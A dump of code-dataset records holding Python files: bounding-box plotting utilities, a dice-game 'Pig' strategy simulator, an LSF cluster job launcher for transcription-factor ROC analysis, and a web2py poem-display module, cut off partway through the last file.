plot_rects(image, [], [], classes=[],\n plot_thresh=plot_thresh,\n color_dict=color_dict, # colormap=colormap,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n t1 = time.time()\n print(\"Time to run plot_refined_df():\", t1 - t0, \"s\")\n return outdir\n\n\ndef refine_and_plot_df(df, groupby='Loc_Tmp', label_map_dict={}, sliced=True, groupby_cat='Category',\n outdir='', plot_thresh=0.33, nms_overlap_thresh=0.5,\n show_labels=True, alpha_scaling=True, plot_line_thickness=2,\n out_cols=[u'Loc_Tmp', u'Prob', u'Xmin', u'Ymin', u'Xmax', u'Ymax', u'Category', 'Image_Root'],\n legend_root='colormap.png', plot=True, skip_empty=False, verbose=True):\n # Plot bounding boxes stored in dataframe\n t0 = time.time()\n\n # group by image, and plot\n group = df.groupby(groupby)\n count = 0\n out_list = []\n print_iter = 1\n for i, g in enumerate(group):\n img_loc_string = g[0]\n data_all_classes = g[1] \n \n image_root = data_all_classes['Image_Root'].values[0]\n\n if (i % print_iter) == 0 and verbose:\n print(i+1, \"/\", len(group), \"Processing image:\", img_loc_string)\n print(\"num of boxes:\", len(data_all_classes))\n \n boxes_im, scores_im, classes_im = [], [], []\n # group by category as well so that detections can be overlapping\n group2 = data_all_classes.groupby(groupby_cat)\n for j, g2 in enumerate(group2):\n class_str = g2[0]\n data = g2[1] \n #classes_str = np.array(len(data) * [class_str])\n scores = data['Prob'].values\n\n if (i % print_iter) == 0 and verbose: \n print(\"Category:\", class_str)\n print(\"num boxes:\", len(data))\n \n if not sliced: \n xmins = data['Xmin'].values\n ymins = data['Ymin'].values\n xmaxs = data['Xmax'].values\n ymaxs = data['Ymax'].values\n else:\n xmins = data['Xmin_Glob'].values\n ymins = data['Ymin_Glob'].values\n xmaxs = data['Xmax_Glob'].values\n ymaxs = data['Ymax_Glob'].values\n \n # filter out low probs\n high_prob_ids = np.where(scores >= plot_thresh)\n scores = scores[high_prob_ids]\n #classes_str = classes_str[high_prob_ids]\n xmins = xmins[high_prob_ids]\n xmaxs = xmaxs[high_prob_ids]\n ymins = ymins[high_prob_ids]\n ymaxs = ymaxs[high_prob_ids]\n probs = scores[high_prob_ids]\n \n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n \n if verbose:\n print(\"len boxes:\", len(boxes))\n\n # NMS\n if nms_overlap_thresh > 0:\n # Try nms with pyimagesearch algorightm\n # assume boxes = [[xmin, ymin, xmax, ymax, ...\n # might want to split by class because we could have a car inside\n # the bounding box of a plane, for example\n boxes_nms_input = np.stack((xmins, ymins, xmaxs, ymaxs), axis=1)\n _, _, good_ids = non_max_suppression(boxes_nms_input, probs, overlapThresh=nms_overlap_thresh)\n if verbose:\n print(\"num boxes_all:\", len(xmins))\n print(\"num good_ids:\", len(good_ids))\n boxes = boxes[good_ids]\n scores = scores[good_ids]\n #classes = classes_str[good_ids]\n \n # create output\n #refine_dic[img_loc_string] = [scores, boxes, classes]\n \n # add to output list\n for score, box in zip(scores, boxes):\n x0, y0, x1, y1 = box\n out_list.append([img_loc_string, score, x0, y0, x1, y1, class_str, image_root])\n \n classes_str = np.array(len(scores) * [class_str])\n image_roots = np.array(len(scores) * [image_root])\n \n # add to image values\n classes_im.extend(classes_str)\n boxes_im.extend(boxes)\n scores_im.extend(scores)\n\n if plot:\n # get colormap, if plotting\n outfile_legend = os.path.join(outdir, legend_root)\n colormap, color_dict = init_colors_legend(outfile_legend, label_map_dict)\n\n image = cv2.imread(img_loc_string, 1)\n if verbose:\n print(\"image.shape:\", image.shape)\n\n if skip_empty:\n z = np.where(scores_im >= plot_thresh)\n if len(z[0]) == 0:\n print(\"Empty image, skip plotting\")\n return\n\n im_root = os.path.basename(img_loc_string)\n im_root_no_ext, ext = im_root.split('.')\n outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' + ext)\n count += len(boxes_im)\n if verbose:\n print(\"outfile:\", outfile)\n \n plot_rects(image, boxes_im, scores_im, classes=classes_im,\n plot_thresh=plot_thresh,\n color_dict=color_dict,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n skip_empty=skip_empty,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n\n # create dataframe\n df_out = pd.DataFrame(out_list, columns=out_cols)\n print(\"Time to run refine_and_plot_df():\", time.time() - t0, \"seconds\")\n return df_out\n\n\ndef init_colors_legend(outfile, label_map_dict, auto_assign_colors=True,\n verbose=False):\n \"\"\"Create and save color legend as image\"\"\"\n if auto_assign_colors:\n # automatically assign colors\n cmap = plt.cm.get_cmap('jet', len(list(label_map_dict.keys())))\n colormap = []\n color_dict = {}\n index = min(label_map_dict) # fix as TensorFlow indexes start from 1\n for i in range(cmap.N):\n rgb = cmap(i)[:3]\n rgb_tuple = tuple([int(255*z) for z in rgb])\n colormap.append(rgb_tuple)\n color_dict[label_map_dict[index]] = rgb_tuple\n index = index + 1\n else:\n colormap = [(255, 0, 0),\n (0, 255, 0),\n (0, 0, 255),\n (255, 255, 0),\n (0, 255, 255),\n (255, 0, 255),\n (0, 0, 255),\n (127, 255, 212),\n (72, 61, 139),\n (255, 127, 80),\n (199, 21, 133),\n (255, 140, 0),\n (0, 165, 255)]\n\n # colors are bgr not rgb https://www.webucator.com/blog/2015/03/python-color-constants-module/\n color_dict = {\n 'small': (255, 0, 0),\n 'pickup': (0, 255, 0),\n 'truck': (0, 0, 255),\n 'van': (255, 255, 0),\n 'bus': (0, 255, 255),\n }\n\n h, w = 800, 400\n xpos = int(0.2*w)\n ydiff = int(0.05*h) \n # LABELS TEXT FONT\n # https://codeyarns.files.wordpress.com/2015/03/20150311_opencv_fonts.png\n font = cv2.FONT_HERSHEY_TRIPLEX # FONT_HERSHEY_SIMPLEX # https://codeyarns.com/2015/03/11/fonts-in-opencv/\n font_size = 0.5\n label_font_width = 1\n\n # rescale height so that if we have a long list of categories it fits \n rescale_h = h * len(label_map_dict.keys()) / 18.\n hprime = max(h, int(rescale_h))\n img_mpl = 255*np.ones((hprime, w, 3))\n\n cv2.putText(img_mpl, 'Color Legend', (int(xpos), int(ydiff)), font, 1.5*font_size, (0, 0, 0),\n int(1.5*label_font_width), cv2.LINE_AA)\n\n for key in label_map_dict.keys():\n itmp = key\n val = label_map_dict[key]\n color = color_dict[val]\n \n text = '- ' + str(key) + ': ' + str(label_map_dict[key])\n ypos = 2 * ydiff + itmp * ydiff\n try:\n cv2.putText(img_mpl, text, (int(xpos), int(ypos)), font, \n 1.5*font_size, color, label_font_width, cv2.LINE_AA)\n except:\n cv2.putText(img_mpl, text, (int(xpos), int(ypos)), font,\n 1.5*font_size, color, label_font_width, cv2.LINE_AA)\n \n cv2.imwrite(outfile, img_mpl)\n if verbose:\n print(\"label_map_dict:\", label_map_dict)\n print(\"colormap:\", colormap)\n print(\"color_dict:\", color_dict)\n return colormap, color_dict\n\n\n#@profile\ndef plot_rects(im, boxes, scores, classes=[], outfile='', plot_thresh=0.3,\n color_dict={}, plot_line_thickness=3, show_labels=True,\n label_alpha_scale=0.85, compression_level=6,\n alpha_scaling=True, skip_empty=False, verbose=False, super_verbose=False, im_root_no_ext=\"notReceived\"):\n \"\"\"Plot boxes in image\n if alpha_scaling, scale box opacity with probability\n if show_labels, plot the label above each box\n extremely slow if alpha_scaling = True\n \"\"\"\n start = time.time()\n\n # label settings\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_size = 0.2\n font_width = 1\n display_str_height = 3\n\n\n if verbose:\n print(\"color_dict:\", color_dict)\n output = im\n h, w = im.shape[:2]\n nboxes = 0\n \n # scale alpha with prob can be extremely slow since we're overlaying a\n # a fresh image for each box, need to bin boxes and then plot. Instead,\n # bin the scores, then plot\n\n # if alpha scaling, bin by scores\n if alpha_scaling:\n # if alpha scaling, bin by scores\n if verbose:\n print(\"Binning scores in plot_rects()...\")\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.digitize.html\n bins = np.linspace(0, 1, 11) # define a step of 0.1 between 0 and 1\n inds = np.digitize(scores, bins) # bin that each element belongs to\n unique_inds = np.sort(np.unique(inds))\n for bin_ind in unique_inds:\n alpha_val = bins[bin_ind]\n boxes_bin = boxes[bin_ind == inds]\n scores_bin = scores[bin_ind == inds]\n classes_bin = classes[bin_ind == inds]\n \n # define overlay alpha\n # rescale to be between 0.3 and 1 (alpha_val starts at 0.1)\n alpha = 0.2 + 0.8*alpha_val\n overlay = np.zeros(im.shape).astype(np.uint8)\n\n # make labels a bit dimmer\n alpha_prime = max(0.25, label_alpha_scale * alpha)\n overlay1 = np.zeros(im.shape).astype(np.uint8)\n\n for box, score, classy in zip(boxes_bin, scores_bin, classes_bin):\n if score >= plot_thresh:\n nboxes += 1\n [ymin, xmin, ymax, xmax] = box\n left, right, top, bottom = xmin, xmax, ymin, ymax\n \n # check boxes\n if (left < 0) or (right > (w-1)) or (top < 0) or (bottom > (h-1)):\n print(\"box coords out of bounds: \", left, right, top, bottom)\n return\n \n if (right < left) or (bottom < top):\n print(\"box coords wrong: \", left, right, top, bottom)\n return\n\n # get label and color\n color = color_dict[classy]\n\n # add rectangle to overlay\n cv2.rectangle(overlay, (int(left), int(bottom)), (int(right), int(top)), color, plot_line_thickness,\n lineType=1)\n\n if show_labels:\n # get location\n display_str = str(classy) + ': ' + str(int(100 * float(score))) + '%'\n # If the total height of the display strings added to the top of the bounding\n # box exceeds the top of the image, stack the strings below the bounding box\n # instead of above.\n #display_str_heights = [font.getsize(ds)[1] for ds in display_str_list]\n # Each display_str has a top and bottom margin of 0.05x.\n total_display_str_height = (1 + 2 * 0.05) * display_str_height\n if top > total_display_str_height:\n text_bottom = top\n else:\n text_bottom = bottom + total_display_str_height\n # Reverse list and print from bottom to top.\n (text_width, text_height), _ = cv2.getTextSize(display_str, \n fontFace=font,\n fontScale=font_size,\n thickness=font_width)\n margin = np.ceil(0.1 * text_height)\n \n # get rect and text coords,\n rect_top_left = (int(left - (plot_line_thickness - 1) * margin), \n int(text_bottom - text_height - (plot_line_thickness + 3) * margin))\n rect_bottom_right = (int(left + text_width + margin), \n int(text_bottom - (plot_line_thickness * margin)))\n text_loc = (int(left + margin), int(text_bottom - (plot_line_thickness + 2) * margin))\n\n # plot\n # if desired, make labels a bit dimmer \n cv2.rectangle(overlay1, rect_top_left, rect_bottom_right, color, -1)\n cv2.putText(overlay1, display_str, text_loc, font, font_size, (0, 0, 0), font_width,\n #cv2.CV_AA)\n cv2.LINE_AA)\n # for the bin, combine overlay and original image \n overlay_alpha = (alpha * overlay).astype(np.uint8)\n\n # masks, https://docs.opencv.org/3.1.0/d0/d86/tutorial_py_image_arithmetics.html\n overlay_gray = cv2.cvtColor(overlay, cv2.COLOR_BGR2GRAY)\n yup = np.nonzero(overlay_gray)\n output_tmp = output.astype(float)\n output_tmp[yup] *= (1.0 - alpha)\n output = cv2.add(output_tmp.astype(np.uint8), overlay_alpha)\n \n # add labels, if desired\n if show_labels:\n overlay_alpha1 = (alpha_prime * overlay1).astype(np.uint8)\n overlay_gray1 = cv2.cvtColor(overlay1, cv2.COLOR_BGR2GRAY)\n yup = np.nonzero(overlay_gray1)\n output_tmp = output.astype(float)\n output_tmp[yup] *= (1.0 - alpha_prime)\n output = cv2.add(output_tmp.astype(np.uint8), overlay_alpha1)\n\n end = time.time()\n print(str(end - start) + \" plot end\")\n # no alpha scaling\n else:\n \n for box, score, classy in zip(boxes, scores, classes):\n \n if score >= plot_thresh:\n nboxes += 1\n [ymin, xmin, ymax, xmax] = box\n left, right, top, bottom = xmin, xmax, ymin, ymax\n\n # area = (xmax - xmin) * (ymax - ymin)\n # get color\n color = color_dict[classy]\n \n if verbose:\n print(\" left, right, top, bottom:\", left, right, top, bottom)\n print(\" classs:\", classy)\n print(\" score:\", score)\n \n # add rectangle\n cv2.rectangle(output, (int(left), int(bottom)), (int(right), int(top)), color, plot_line_thickness)\n \n # plot categories too?\n if show_labels:\n # adapted from visualizion_utils.py\n # get location\n display_str = str(classy) + ': ' + str(int(100 * float(score))) + '%' # + str(int(area))\n # If the total height of the display strings added to the top of the bounding\n # box exceeds the top of the image, stack the strings below the bounding box\n # instead of above.\n #display_str_heights = [font.getsize(ds)[1] for ds in display_str_list]\n # Each display_str has a top and bottom margin of 0.05x.\n total_display_str_height = (1 + 2 * 0.05) * display_str_height\n if top > total_display_str_height:\n text_bottom = top\n else:\n text_bottom = bottom + total_display_str_height\n # Reverse list and print from bottom to top.\n (text_width, text_height), _ = cv2.getTextSize(display_str, \n fontFace=font,\n fontScale=font_size,\n thickness=font_width) #5, 5#font.getsize(display_str)\n margin = np.ceil(0.1 * text_height)\n \n # get rect and text coords,\n rect_top_left = (int(left - (plot_line_thickness - 1) * margin),\n int(text_bottom - text_height - (plot_line_thickness + 3) * margin))\n rect_bottom_right = (int(left + text_width + margin), int(text_bottom - (plot_line_thickness * margin)))\n text_loc = (int(left + margin), \n int(text_bottom - (plot_line_thickness + 2) * margin))\n \n # annoying notch between label box and bounding box, \n # caused by rounded lines, so if\n # alpha is high, move everything down a smidge\n rect_top_left = (rect_top_left[0], int(rect_top_left[1] + margin))\n rect_bottom_right = (rect_bottom_right[0], int(rect_bottom_right[1] + margin))\n text_loc = (text_loc[0], int(text_loc[1] + margin))\n\n cv2.rectangle(output, rect_top_left, rect_bottom_right, color, -1)\n cv2.putText(output, display_str, text_loc, font, font_size, (0, 0, 0), font_width, cv2.LINE_AA)\n\n if skip_empty and nboxes == 0:\n return\n else:\n cv2.imwrite(outfile, output, [cv2.IMWRITE_PNG_COMPRESSION, 9])\n # for JPEG , [cv2.IMWRITE_JPEG_QUALITY, 40]\n # for PNG , [cv2.IMWRITE_PNG_COMPRESSION, compression_level])\n\n # check if txt output folder exists:\n directory = os.path.dirname(outfile) + \"/\" + \"txt_\" + str(plot_thresh)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n outfiletxt = directory + \"/\" + im_root_no_ext + \".txt\" # save txt files to txt folder\n output_txt = []\n for box, score, classy in zip(boxes, scores, classes):\n if score >= plot_thresh:\n nboxes += 1\n [ymin, xmin, ymax, xmax] = box\n output_txt.append([classy, score, xmin, ymin, xmax, ymax])\n with open(outfiletxt, \"w\") as f:\n writer = csv.writer(f, delimiter=' ')\n writer.writerows(output_txt)\n return\n","sub_path":"myscripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":48741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274242187","text":"import random\nfrom functools import update_wrapper\n\n\ndef decorator(decor):\n \"\"\"Update the wrapper of decor(function), where decor is a decorator function.\n\n Returns a reference to the function object update_wrapper()\n \"\"\"\n def _decor(function):\n return update_wrapper(decor(function), function)\n\n update_wrapper(_decor, decor)\n return _decor\n\n\n@decorator\ndef memo(function):\n \"\"\"Decorator that caches the return value for each call to function(*args).\"\"\"\n def _function(*args):\n try:\n return cache[args]\n # not in cache\n except KeyError:\n cache[args] = function(*args)\n return cache[args]\n # args is not hashable\n except TypeError:\n return function(*args)\n\n return _function\n\n\ndef fair_die_rolls():\n \"\"\"Iterator that generates random die rolls.\"\"\"\n while True:\n yield random.randint(1, 6)\n\n\ndef play_pig_d(A, B, dierolls=fair_die_rolls()):\n \"\"\"Play a game of pig between two players, represented by their strategies.\n\n Each time through the main loop we ask the current player for one decision,\n which must be 'hold' or 'roll', and we update the state accordingly.\n When one player's score exceeds the goal, return that player.\n\n At any point in the game, a player (let's say player A) can offer to 'double' the game.\n Player B then has to decide to 'accept', in which case the game is played through as normal,\n but it is now worth two points, or 'decline,' in which case player B immediately loses and\n player A wins one point.\n \"\"\"\n strategies = [A, B]\n state = (0, 0, 0, 0, 1)\n other = {1: 0, 0: 1}\n while True:\n (p, me, you, pending, double) = state\n if me >= goal:\n return strategies[p], double\n elif you >= goal:\n return strategies[other[p]], double\n else:\n action = strategies[p](state)\n state = do(action, state, dierolls)\n\n\ndef do(action, state, dierolls):\n \"\"\"Return the state that results from doing action in state.\n\n If action is not legal, return a state where the opponent wins.\n Can use dierolls if needed.\n \"\"\"\n (p, me, you, pending, double) = state\n other = {1: 0, 0: 1}\n if action not in pig_actions_d(state):\n return (other[p], goal, 0, 0, double)\n elif action == 'roll':\n d = next(dierolls)\n if d == 1:\n return (other[p], you, me + 1, 0, double) # pig out; other player's turn\n else:\n return (p, me, you, pending + d, double) # accumulate die in pending\n elif action == 'hold':\n return (other[p], you, me + pending, 0, double)\n elif action == 'double':\n return (other[p], you, me, pending, 'double')\n elif action == 'decline':\n return (other[p], goal, 0, 0, 1)\n elif action == 'accept':\n return (other[p], you, me, pending, 2)\n\n\ndef pig_actions_d(state):\n \"\"\"Take a state (p, me, you, pending, double), as input and return all legal actions.\n\n double can be either: 1, 2 or 'double'\n - 1 or 2 denote the value of the game\n - 'double' is reserved for the moment at which one player has doubled and is waiting\n for the other to accept or decline\n\n An action is one of [\"roll\", \"hold\", \"accept\", decline\", \"double\"]\n - If double is \"double\", can only \"accept\" or \"decline\"\n - If double is 1, can \"double\" (in addition to other moves). If double > 1, cannot \"double\"\n - Can't \"hold\" if pending is 0\n \"\"\"\n (p, me, you, pending, double) = state\n if double == 'double':\n return ['accept', 'decline']\n actions = ['roll']\n if double == 1:\n actions.append('double')\n if pending > 0:\n actions.append('hold')\n return actions\n\n\ndef strategy_compare(first_strategy, second_strategy, trials=1000):\n \"\"\"Takes two strategies, A and B, as input and returns the percentage of points won by strategy A.\"\"\"\n first_points, second_points = 0, 0\n for i in range(trials):\n if i % 2 == 0: # take turns with who goes first\n winner, points = play_pig_d(first_strategy, second_strategy)\n else:\n winner, points = play_pig_d(second_strategy, first_strategy)\n if winner.__name__ == first_strategy.__name__:\n first_points += points\n else:\n second_points += points\n percent = 100 * first_points / float(first_points + second_points)\n print('For goal = %d and number of trials = %d, strategy %s took %s percent of the points against %s.' %\n (goal, trials, first_strategy.__name__, percent, second_strategy.__name__))\n return percent\n\n\ndef clueless_d(state):\n \"\"\"A strategy that ignores the state and chooses at random from possible moves.\"\"\"\n return random.choice(pig_actions_d(state))\n\n\ndef hold_20_d(state):\n \"\"\"A strategy that holds at 20 pending. Always accept; never double.\"\"\"\n (p, me, you, pending, double) = state\n return ('accept' if double == 'double' else\n 'hold' if (pending >= 20 or me + pending >= goal) else\n 'roll')\n\n\ndef strategy_d(state):\n \"\"\"The optimal pig strategy; chooses the action with the highest expectation of points to win.\"\"\"\n return best_action(state, pig_actions_d, pig_action_utility, pig_utility)\n\n\ndef best_action(state, actions, action_utility, utility):\n \"\"\"Return the optimal action for a given state.\n\n - actions is a function that returns the legal actions from the given state\n - action_utility is a function that returns the expected utility (value) of the next state for the\n optimal player. The next state depends on the specified action\n - utility is a function that returns the expected utility (value) of a state for the optimal player\n \"\"\"\n def expected_utility(action):\n return action_utility(state, action, utility)\n\n return max(actions(state), key=expected_utility)\n\n\ndef pig_action_utility(state, action, utility):\n \"\"\"The expected value of choosing action in state.Assumes opponent also plays with optimal strategy.\n\n An action is one of [\"roll\", \"hold\", \"accept\", decline\", \"double\"]\n \"\"\"\n if action == 'roll':\n one = iter([1])\n rest = iter([2, 3, 4, 5, 6])\n return (-utility(do(action, state, one)) + sum(utility(do(action, state, rest)) for _ in range(5))) / 6.0\n else:\n return -utility(do(action, state, fair_die_rolls()))\n\n\n@memo\ndef pig_utility(state):\n \"\"\"Return the expected utility (value) of the specified state for an optimal player.\"\"\"\n (p, me, you, pending, double) = state\n if double == 'double':\n return max(pig_action_utility(state, action, pig_utility) for action in pig_actions_d(state))\n if me + pending >= goal:\n return double\n elif you >= goal:\n return -double\n else:\n return max(pig_action_utility(state, action, pig_utility) for action in pig_actions_d(state))\n\n\ndef test():\n assert set(pig_actions_d((0, 2, 3, 0, 1))) == {'roll', 'double'}\n assert set(pig_actions_d((1, 20, 30, 5, 2))) == {'hold', 'roll'}\n assert set(pig_actions_d((0, 5, 5, 5, 1))) == {'roll', 'hold', 'double'}\n assert set(pig_actions_d((1, 10, 15, 6, 'double'))) == {'accept', 'decline'}\n assert strategy_compare(strategy_d, hold_20_d, trials=10000) > 60 # must win 60% of the points\n return 'test passes'\n\n\n# goal = 40\n# print(test())\n\nfor goal in range(35, 46):\n cache = {}\n strategy_compare(strategy_d, hold_20_d, trials=10000)","sub_path":"src/DoublingPig.py","file_name":"DoublingPig.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499416720","text":"\n# Import\nimport os\nimport sys\nfrom glob import glob\n\n# Cell Loop\ncellList = [\"H1hesc\", \"K562\"]\ncellList = [\"K562\"]\nfor cell in cellList:\n\n # Factor Loop\n rl = \"/hpcwork/izkf/projects/TfbsPrediction/Results/Footprints/ROC_SBTC/\"+cell+\"/\"\n tfList = [e.split(\"/\")[-1].split(\"_\")[0] for e in glob(rl+\"*_roc.txt\")]\n tfList = [\"MEF2A\"]\n for tf in tfList:\n\n # Parameters\n ml=\"/hpcwork/izkf/projects/TfbsPrediction/Results/MPBSAWG/\"+cell+\"_Evidence/\"\n pl=\"/hpcwork/izkf/projects/TfbsPrediction/Results/Footprints/Results/\"+cell+\"/\"\n outputLocation = \"/hpcwork/izkf/projects/TfbsPrediction/Results/Footprints/ROC_NM3/\"+cell+\"/\"\n os.system(\"mkdir -p \"+outputLocation)\n mpbsName = tf\n inList = [\nml+\"fdr_4.bed\",\npl+\"Boyle_DU.bed\",\npl+\"Centipede_80.bed\",\npl+\"Centipede_85.bed\",\npl+\"Centipede_90.bed\",\npl+\"Centipede_95.bed\",\npl+\"Centipede_99.bed\",\npl+\"Cuellar_80.bed\",\npl+\"Cuellar_85.bed\",\npl+\"Cuellar_90.bed\",\npl+\"Cuellar_95.bed\",\npl+\"Cuellar_99.bed\",\npl+\"Dnase2Tf_DU.bed\",\npl+\"Dnase2Tf_rank.bed\",\npl+\"FLR_80.bed\",\npl+\"FLR_85.bed\",\npl+\"FLR_90.bed\",\npl+\"FLR_95.bed\",\npl+\"FLR_99.bed\",\npl+\"FS_DU.bed\",\npl+\"HINT-BC_D_DU.bed\",\npl+\"HINT-BCN_D_DU.bed\",\npl+\"HINT_D_DU.bed\",\npl+\"Neph_DU.bed\",\npl+\"PIQ_80.bed\",\npl+\"PIQ_85.bed\",\npl+\"PIQ_90.bed\",\npl+\"PIQ_95.bed\",\npl+\"PIQ_99.bed\",\npl+\"TC_DU.bed\",\npl+\"Wellington_DU.bed\",\npl+\"Wellington_rank.bed\",\npl+\"Protection_DU.bed\",\npl+\"BinDNase_80.bed\",\npl+\"BinDNase_85.bed\",\npl+\"BinDNase_90.bed\",\npl+\"BinDNase_95.bed\",\npl+\"BinDNase_99.bed\",\npl+\"BinDNase_rank.bed\"\n]\n bedList = \",\".join(inList)\n typeList = \",\".join([\"SC\" if \"Cuellar\" in e or \"FS\" in e or \"TC\" in e or \"fdr\" in e or \"Protection\" in e else \"SB\" for e in inList])\n labelList = \",\".join([\"PWM\"]+[e.split(\"/\")[-1].split(\".\")[0] for e in inList[1:]])\n\n # Execution\n myL = \"_\".join([cell,tf,\"ROC\"])\n clusterCommand = \"bsub \"\n clusterCommand += \"-J \"+myL+\" -o \"+myL+\"_out.txt -e \"+myL+\"_err.txt \"\n clusterCommand += \"-W 100:00 -M 60000 -S 100 -P izkf -R \\\"select[hpcwork]\\\" ./rocFromBedSBSC_pipeline.zsh \"\n clusterCommand += mpbsName+\" \"+typeList+\" \"+labelList+\" \"+bedList+\" \"+outputLocation\n os.system(clusterCommand)\n # \n\n","sub_path":"Code/Graphics/Pipeline/rocFromBedSBSC_call.py","file_name":"rocFromBedSBSC_call.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490793427","text":"import logging\nfrom gluon import A\nfrom gluon import DIV\nfrom gluon import H3\nfrom gluon import H4\nfrom gluon import H5\nfrom gluon import I\nfrom gluon import IS_IN_SET\nfrom gluon import LI\nfrom gluon import P\nfrom gluon import MARKMIN\nfrom gluon import SQLFORM\nfrom gluon import SPAN\nfrom gluon import TAG\nfrom gluon import UL\nfrom gluon import URL \nfrom gluon import XML\nfrom gluon import xmlescape\n\n\ndate_format = '%B %Y'\nindex_class = 'col-xs-12 col-sm-6 col-md-4'\npoem_class = 'col-xs-12 col-sm-10 col-md-8'\n\ndef _thumb(row, cls, title=None):\n \"\"\" Return a column DIV thumbnail. \"\"\"\n caption = DIV(\n H3(row.chapter.title),\n H4('Chapter %i' % row.chapter.number),\n H5(row.published.strftime(date_format)),\n H3(row.intro_hanzi),\n H4(row.intro_en),\n _class='caption',\n _role='button',\n _title=title)\n anchor = A(\n caption,\n _class='ddj-thumbnail',\n _href=URL('poems', 'chapter', args=[row.chapter.number]))\n thumbnail = DIV(anchor, _class='thumbnail')\n return DIV(thumbnail, _class=cls)\n\ndef chapter(poem, db, uhdb):\n \"\"\" Return a bootstrap row for a poem row. \"\"\"\n if not poem:\n raise Exception('No such poem')\n qry = ((db.verse.book==1) & (db.verse.chapter==poem.chapter))\n verse = db(qry).select().first()\n title = H3(poem.chapter.title)\n subtitle = H4('Chapter %i' % poem.chapter.number)\n published = H5(poem.published.strftime(date_format))\n stanzas = verse.en.split('\\r\\n\\r\\n')\n content = []\n for stanza in stanzas:\n content.append(P(XML(stanza.replace('\\r\\n', '
'))))\n link = P(\n A(\n I('Go to the study version'),\n _href=URL('studies', 'chapter', args=[poem.chapter.number]),\n _style='color:inherit;',\n _title='Study version'),\n _style='font-size:0.9em;padding-top:1em')\n content.append(P(link))\n column = DIV(title, subtitle, published, *content, _class=poem_class)\n return DIV(\n column, _class='row',\n _style='font-size:1.12em;white-space:nowrap;')\n\ndef chapter_range(page_number):\n if page_number >= 1 and page_number <= 9:\n low = ((page_number-1)*9)+1\n high = page_number*9\n else:\n raise Exception('No such page')\n return low, high\n\ndef decache(chapter, db):\n \"\"\" Clear study chapter cache data. \"\"\"\n import studies\n from gluon import current\n\n # Decache the associated study.\n studies.decache(chapter, db)\n\n # Decache the poem itself.\n current.cache.ram('poem-%d' % chapter, None)\n\n # Decache links in the next poem.\n qry = db.poem.chapter > int(chapter)\n nxt = db(qry).select(limitby=(0,1), orderby=db.poem.chapter)\n if nxt:\n current.cache.ram('links-%d' % nxt.first().chapter, None)\n\n # Decache links in the previous poem.\n qry = db.poem.chapter < chapter\n prev = db(qry).select(limitby=(0,1), orderby=~db.poem.chapter)\n if prev:\n current.cache.ram('links-%d' % prev.first().chapter, None)\n\n # Decache the page containing the poem.\n page = (chapter + 8) / 9\n current.cache.ram('poems-%d' % page, None)\n\ndef grid(db, deletable=False):\n \"\"\" Return an SQLFORM.grid to manage poems. \"\"\"\n\n createargs = editargs = viewargs = {\n 'fields': [\n 'chapter', 'published', 'intro_hanzi', 'intro_en']}\n fields = [\n db.poem.chapter,\n db.poem.published,\n db.poem.intro_hanzi,\n db.poem.intro_en]\n maxtextlengths = {'poem.published': 50}\n onupdate = lambda form: decache(int(form.vars.chapter), db)\n db.poem.published.represent = lambda value, row: value.strftime(date_format)\n db.poem.chapter.requires = IS_IN_SET(range(1, 82), zero=None)\n grid = SQLFORM.grid(\n db.poem,\n createargs=createargs,\n csv=False,\n deletable=deletable,\n details=False,\n editargs=editargs,\n fields=fields,\n maxtextlengths=maxtextlengths,\n oncreate=onupdate,\n onupdate=onupdate,\n orderby=db.poem.chapter,\n paginate=None,\n searchable=False,\n viewargs=viewargs)\n return grid\n\ndef index(page_number, db):\n \"\"\" Return a row DIV of a page of poems. \"\"\"\n low, high = chapter_range(page_number)\n qry = ((db.poem.chapter>=low) & (db.poem.chapter<=high))\n thumbs = []\n for row in db(qry).select(orderby=db.poem.chapter):\n thumbs.append(_thumb(row, index_class))\n return DIV(thumbs, _class='row display-flex')\n\ndef links(poem, db):\n \"\"\" Return a row DIV of prev/next poems. \"\"\"\n thumbs = []\n\n # Next.\n qry = db.poem.chapter > poem.chapter\n nxt = db(qry).select(limitby=(0,1), orderby=db.poem.chapter)\n if not nxt:\n qry = db.poem.chapter >= 1\n nxt = db(qry).select(limitby=(0,1), orderby=db.poem.chapter)\n if nxt: \n thumbs.append(_thumb(nxt.first(), poem_class, 'Next'))\n\n # Previous.\n qry = db.poem.chapter < poem.chapter\n prev = db(qry).select(limitby=(0,1), orderby=~db.poem.chapter)\n if not prev:\n qry = db.poem.chapter <= 81\n prev = db(qry).select(limitby=(0,1), orderby=~db.poem.chapter)\n if prev:\n thumbs.append(_thumb(prev.first(), poem_class, 'Previous'))\n\n # Bootstrap.\n return DIV(\n thumbs,\n _class='row',\n _style='padding-top: 2.5em;')\n\ndef pager(db):\n \"\"\" Return a row DIV for a pager. \"\"\"\n from gluon import current\n\n # Previous/current/next page.\n if current.request.args(0):\n current_page = int(current.request.args(0))\n else:\n current_page = 1\n prev_page = current_page - 1\n next_page = current_page + 1\n\n # List of LI.\n pages = []\n\n # Previous/left.\n li_class = ''\n href = URL('poems', 'page', args=[str(prev_page)])\n if prev_page < 1:\n li_class = 'disabled'\n href = '#'\n elif prev_page == 1:\n href = URL('poems', 'index')\n span = SPAN(xmlescape(u'\\u4e0a'), **{'_aria-hidden': 'true'})\n anchor = A(span, _href=href, **{'_aria-label': 'Previous'})\n pages.append(LI(anchor, _class=li_class, _title='Previous Page'))\n\n # Chapter range links.\n for page in range(1, 10):\n li_class = ''\n href = URL('poems', 'page', args=[str(page)])\n page_range = ['%d-%d' % (((page-1)*9)+1, page*9)]\n if page == 1:\n href = URL('poems', 